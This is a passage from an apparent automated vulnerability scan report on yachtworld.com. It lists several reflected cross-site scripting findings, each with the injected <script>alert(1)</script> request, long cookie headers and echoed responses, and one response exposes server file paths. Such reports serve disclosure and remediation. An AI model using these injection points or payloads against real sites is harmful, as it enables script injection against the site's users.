User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:01:21 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<link rel="stylesheet" type="te
...[SNIP]...
<a href='/privatelabel/listing/pl_display_photo.jsp?slim=pp279757e075d'><script>alert(1)</script>458e4d47109&boat_id=2267335&boatname=29%27+Grady+White+290+Chesapeake&photo_revised_date=1285442537000&photo_name=Photo+1&photo=30&url='>
...[SNIP]...

3.519. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [units parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the units request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload afbf8'><script>alert(1)</script>cd465d0da5d was submitted in the units parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feetafbf8'><script>alert(1)</script>cd465d0da5d&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:01:40 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/privatelabel/listing/pl_boat_full_detail.jsp?slim=pp279757&boat_id=2267335&ybw=&units=Feetafbf8'><script>alert(1)</script>cd465d0da5d&currency=USD&access=Public&listing_id=20826&url='>
...[SNIP]...

3.520. http://www.yachtworld.com/southpaw/email.cgi [office_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/southpaw/email.cgi

Issue detail

The value of the office_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d15d"><script>alert(1)</script>a4256dea441 was submitted in the office_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /southpaw/email.cgi?url=southpaw&office_id=1123775d15d"><script>alert(1)</script>a4256dea441 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:00 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1



<html>
<head>
<TITLE>Southpaw Yacht Sales (Greenwich, CT)</TITLE>
<META name="keywords" conten
...[SNIP]...
<INPUT TYPE="hidden" NAME="office_id" VALUE="1123775d15d"><script>alert(1)</script>a4256dea441">
...[SNIP]...

3.521. http://www.yachtworld.com/southpaw/southpaw_1.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/southpaw/southpaw_1.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload 250f5<script>alert(1)</script>3f56b3eb3b0 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /southpaw/southpaw_1.cgi?company=southpaw&limit=50&type=&new=&units=Feet&hosturl=southpaw250f5<script>alert(1)</script>3f56b3eb3b0&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:17 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/southpaw250f5<script>alert(1)</script>3f56b3eb3b0/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/southpaw250f5<script>
...[SNIP]...

3.522. http://www.yachtworld.com/southpaw/southpaw_1.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/southpaw/southpaw_1.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 785ea--><script>alert(1)</script>40b6889262d was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /southpaw/southpaw_1.cgi?company=southpaw&limit=50&type=&new=&units=Feet&hosturl=southpaw785ea--><script>alert(1)</script>40b6889262d&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:24 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<script>alert(1)</script>40b6889262d/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/southpaw785ea-->
...[SNIP]...

3.523. http://www.yachtworld.com/starlingmarine/email.cgi [office_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/starlingmarine/email.cgi

Issue detail

